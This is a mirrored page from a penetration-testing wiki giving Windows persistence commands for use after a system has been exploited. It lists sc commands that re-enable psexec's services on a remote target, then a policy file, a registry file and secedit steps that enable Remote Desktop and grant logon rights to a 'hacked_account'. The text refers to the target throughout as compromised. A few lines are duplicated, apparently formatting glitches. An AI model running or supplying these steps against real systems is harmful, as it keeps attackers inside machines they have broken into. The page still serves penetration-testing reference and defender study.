weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
pwnwiki.github.io/persistence/windows/general.md

3.0 KiB
Raw Blame History

Windows General Persistence Commands

Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the cmd.exe or command.exe prompt.

Enable psexec

The psexec tool executes processes on other systems over a network. Most systems now disable the "clipbook" which psexec required. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 50), you can re-enable the sub-systems needed to use psexec using the sc commands below.

c:\> net use \\target\ipc$ username /user:password c:\> sc \\target config netdde start= auto c:\> sc \\target config netddedsdm start= auto c:\> sc \\target config clipsrv start= auto c:\> sc \\target start netdde c:\> sc \\target start netddedsdm c:\> sc \\target start clipsrv

Enable Remote Desktop

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can remotely enable remote desktop using the commands below.

  1. On the compromised system, create a file named fix_ts_policy.ini containing the contents below. Change the "hacked_account" value to the account you have compromised on the remote system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights] [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =

  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
 "fDenyTSConnections"=dword:00000000
 "TSEnabled"=dword:00000001
 "TSUserEnabled"=dword:00000000

  3. On the remote system, execute the following commands:

    c:\> sc config termservice start= auto sc config termservice start= auto c:\> regedit /s enable_ts.reg c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:\> gpupdate /Force c:\> net start "terminal services"